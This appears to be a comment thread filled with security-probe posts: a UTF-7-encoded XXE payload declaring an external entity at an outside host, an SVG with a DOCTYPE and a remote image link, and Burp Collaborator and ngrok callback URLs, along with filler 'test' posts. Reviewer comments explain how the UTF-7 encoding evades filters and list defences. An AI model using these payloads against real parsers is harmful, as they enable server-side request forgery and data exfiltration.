Replies
-
<?xml version="1.0" encoding="UTF-7"?> +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
<!-- Reviewer note: the declaration above selects UTF-7, and the rest of the
     line is written as UTF-7 shift sequences. Decoded, it is a DOCTYPE whose
     internal subset declares an external (SYSTEM) entity named xxe with an
     HTTP system identifier, followed by a foo root element that references
     that entity. Only the markup delimiters (angle brackets, quotes, square
     brackets, ampersand, semicolon) are encoded, so a filter that matches the
     literal byte sequence of an opening DOCTYPE or ENTITY declaration on the
     raw input does not match this form; inspection has to happen after
     decoding. Defensive handling: accept only the encodings the application
     expects (normally UTF-8 or UTF-16), reject any inbound document that
     carries a DOCTYPE, and keep DTD loading and external entity resolution
     disabled in the parser. -->
-
<!DOCTYPE testingxxe [ <!ENTITY xml "placeholder"> ]> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <image height="30" width="30" xlink:href="https://<EXAMPLE_SERVER>/image.jpeg" /> </svg>
<!-- Reviewer note: the internal subset declares one internal entity (named
     xml, value "placeholder") that is never referenced in the document, so
     the DOCTYPE itself resolves nothing external. The only remote reference
     is the xlink:href on the image element; the host is shown as a redacted
     placeholder, and the literal angle brackets inside that attribute value
     make the line not well-formed as printed. A server-side SVG renderer or
     thumbnailer that fetches remote images would issue an outbound request
     for that URL when processing such a file. Defensive handling: reject SVG
     input that carries a DOCTYPE, sanitise or strip remote href targets, and
     run any SVG rendering with network fetching disabled or restricted to an
     allowlist. -->
-
> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <image height="30" width="30" xlink:href="https://<EXAMPLE_SERVER>/image.jpeg" /> </svg>"]<!DOCTYPE testingxxe [ <!ENTITY xml "placeholder"> ]> <svg…
-
test
-
test
-
test
-
-
[url="http://"]66a91fs5ps35ubroeoeag0kqehkj88.burpcollaborator.net[/url]
-
-
testtest
-
[url=" http://3ddaa3ee470e.ngrok.io/test.jpg"] 3ddaa3ee470e.ngrok.io/test.jpg[/url]
-
-
testtst